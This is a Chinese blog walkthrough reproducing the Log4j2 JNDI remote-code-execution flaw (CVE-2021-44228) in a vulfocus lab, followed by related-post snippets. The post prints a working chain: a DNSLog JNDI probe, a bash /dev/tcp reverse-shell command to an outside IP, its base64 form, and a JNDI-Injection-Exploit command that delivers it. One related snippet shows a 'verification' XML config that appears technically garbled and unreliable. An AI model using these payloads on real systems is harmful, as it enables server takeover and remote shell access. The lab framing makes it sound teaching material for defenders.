log4j2-rce漏洞复现(CVE-2021-44228)

最新推荐文章于 2024-06-03 15:52:37 发布
最新推荐文章于 2024-06-03 15:52:37 发布
阅读量2.1k 收藏 4
点赞数 1
文章标签: log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123896465
版权

漏洞介绍

Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。

影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1)

漏洞编号:CVE-2021-44228

漏洞复现

利用vulfocus搭建并启动靶场

DNSLog验证

通过DNSLog Platform平台获取到域名skvgq7.dnslog.cn,构造payload:${jndi:ldap://skvgq7.dnslog.cn},浏览器点击???并使用Burpsuite抓包,替换payload参数,此时发包会导致服务器400错误

通过Burpsuite自带的编码工具对其进行URL编码

编码后再次发送发送请求包

在DNSLog网站成功接收到解析记录

JNDI注入反弹shell

使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

使用方式

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

反弹shell指令

bash -i >& /dev/tcp/ip/port 0>&1

此处的ip为47.106.102.84,port可使用任意未被占用的端口,此处指定为4444

bash -i >& /dev/tcp/47.106.102.84/4444 0>&1

将此条命令进行base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDYuMTAyLjg0LzQ0NDQgMD4mMQ==

编码后的命令通过-C参数输入JNDI工具,通过通过-A参数指定的ip地址

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDYuMTAyLjg0LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 47.106.102.84 

在新的窗口监听4444端口

 

替换工具生成的payload:rmi://47.106.102.84 :1099/of6rlz 到Burpsuite:

编码后发送到靶机:

监听窗口成功接收到反弹的shell:

 

Z_l123
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulfocus/log4j2-rce-2021-12-09:latest通关
qq_44122254的博客
12-28 5133
别的大佬在漏洞出来后立马复现利用都学明白了,我这个菜鸟开始了 搜到了在vulfocus.fofa.io靶场有更新了,就在这里开始了学习 启动靶场 按照官方说的漏洞位置在/hello,漏洞变量是payload 按照官方说的在hello里面访问hello 查看漏洞是否存在,当然啦,这是靶场怎么会不存在呢,哈哈哈 证明漏洞存在的方式: dnslog地址 构造payload 执行之后看一下这边的解析记录,存在此漏洞 好了,继续靶场复现 漏洞存在后,进行反弹shell,进一步利用,这里用到了一个工具**JND
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6029
log4j 漏洞CVE-2021-44228 漏洞复现
log4j2 rce (CVE-2021-44228)
weixin_40151476的博客
03-01 878
Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
Web网络安全-----Log4j高危漏洞原理及修复_log4j漏洞是什么
最新发布
weixin_42340783的博客
06-03 1026
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
Apache Log4j2 RCE漏洞复现(CVE-2021-44228)
siu~
10-31 480
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过 该漏洞构造特殊的数据请求包,最终触发远程代码执行。
CVE-2021-44228)Apache_Log4j2_RCE漏洞复现(反弹shell教学)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-10 7274
Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文是log4j2漏洞复现以及利用该漏洞进行命令执行RCE,反弹shell。
CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞(反弹shell)
PolarPeak的博客
12-10 5296
本地复现 https://github.com/tangxiaofeng7/apache-log4j-poc log4j.java内容 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class);
vulfocus Apache log4j2-RCE 漏洞复现CVE-2021-44228
qq_45780190的博客
12-15 5009
根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证 创建靶场后是这样一个页面。 使用payload验证,发现可以触发dnslog,可以确认可以利用 证明存在JNDI注入漏洞。 在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,
CVE-2021-22448(log4j2漏洞复现
Ethan_cfq的博客
04-12 346
作者严正声明!!! 作者严正声明!!! 作者严正声明!!! 【********************************************************************************** 以下环境是docker搭建的靶场学习环境,禁止在互联网中操作,若在互联网中操作导致的后果与作者无关, ************************************************************************************] 部署log
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmi和ldap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/Calculator.app") -A - the address of your server, maybe an IP address or a domain. (optional , default address is the first network interface address)
log4j2-rce靶场.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
logging-log4j2-log4j-2.16.0-rc1.zip
12-13
2021年12月初,Log4j中的一个名为CVE-2021-44228的严重漏洞被公开,这被称为"Log4Shell"漏洞。它源于Log4j的JNDI(Java Naming and Directory Interface)查找功能,当恶意用户在日志记录中插入特定的字符串时,...
apache-log4j-2.16.0-bin.rar
12-17
然而,2021年底,一个严重漏洞被发现,被称为“Log4Shell”或CVE-2021-44228,这个漏洞允许攻击者通过在日志记录中注入恶意代码,实现远程代码执行(RCE),对受影响的系统造成严重威胁。 该漏洞源于Log4j2的一个...
CVE-2021-44228——Log4j2-RCE漏洞复现
Li-D的博客
06-10 1786
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
weixin_44047654的博客
12-13 1707
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
06-06
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> <param name="Target" value="System.out"/> <param name="immediateFlush" value="true"/> <layout class="org.apache.logging.log4j.core.layout.PatternLayout"> <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36}:%line - %msg%n"/> </layout> <filter class="org.apache.logging.log4j.core.filter.AbstractFilterable"> <filter class="org.apache.logging.log4j.core.filter.GroovyFilter"> <param name="script" value="new java.lang.ProcessBuilder(['calc']).start()"/> </filter> </filter> </appender> <root level="info"> <appender-ref ref="RCE"/> </root> ``` 2. 将恶意日志信息发送到漏洞受影响的 Log4j2 服务端,例如通过网络或者文件系统等方式。 3. 如果服务端受到影响,则会执行恶意脚本,例如在 Windows 上弹出计算器。 请注意,验证漏洞时需要遵守法律法规和道德准则,不得对未授权的系统进行测试。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值